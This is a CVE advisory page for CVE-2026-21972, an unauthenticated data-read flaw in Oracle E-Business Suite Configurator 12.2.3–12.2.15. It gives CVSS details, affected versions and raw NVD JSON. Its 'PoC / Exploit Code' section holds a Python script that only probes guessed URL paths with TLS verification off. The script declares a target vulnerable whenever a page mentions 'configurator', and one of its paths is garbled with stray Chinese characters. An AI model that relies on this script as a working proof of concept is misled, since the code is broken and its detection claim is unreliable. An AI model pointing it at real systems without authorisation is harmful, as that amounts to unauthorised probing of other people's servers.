Security Vulnerability Report
中文
CVE-2026-21972 CVSS 5.3 MEDIUM

CVE-2026-21972

Published: 2026-01-20 22:16:00
Last Modified: 2026-01-29 14:47:19

Description

Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Configurator accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:configurator:*:*:*:*:*:*:*:* - VULNERABLE
Oracle Configurator 12.2.3
Oracle Configurator 12.2.4
Oracle Configurator 12.2.5
Oracle Configurator 12.2.6
Oracle Configurator 12.2.7
Oracle Configurator 12.2.8
Oracle Configurator 12.2.9
Oracle Configurator 12.2.10
Oracle Configurator 12.2.11
Oracle Configurator 12.2.12
Oracle Configurator 12.2.13
Oracle Configurator 12.2.14
Oracle Configurator 12.2.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-21972 PoC - Oracle Configurator Information Disclosure # Target: Oracle E-Business Suite Configurator User Interface # This PoC demonstrates unauthenticated access to restricted data def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2026-21972""" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Accept': 'application/json, text/html', } # Common Configurator paths that may expose sensitive data paths = [ '/configurator/', '/OA_HTML/configurator/', '/forms/c配置urator/', '/xmlpserver/configurator/', ] for path in paths: url = target_url.rstrip('/') + path try: response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200 and 'configurator' in response.text.lower(): print(f'[+] Potential vulnerability found at: {url}') return True except requests.RequestException as e: print(f'[-] Error accessing {url}: {e}') return False if __name__ == '__main__': target = input('Enter target URL: ') check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21972", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:16:00.330", "lastModified": "2026-01-29T14:47:18.797", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Configurator accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle Configurator de Oracle E-Business Suite (componente: Interfaz de Usuario). Las versiones compatibles que están afectadas son 12.2.3-12.2.15. Una vulnerabilidad fácilmente explotable permite a un atacante no autenticado con acceso a la red vía HTTP comprometer Oracle Configurator. Ataques exitosos de esta vulnerabilidad pueden resultar en acceso de lectura no autorizado a un subconjunto de datos accesibles de Oracle Configurator. Puntuación Base CVSS 3.1 5.3 (Impactos en la Confidencialidad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:configurator:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.15", "matchCriteriaId": "327DECB4-3BE7-43C2-94AA-FF821F802F92"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}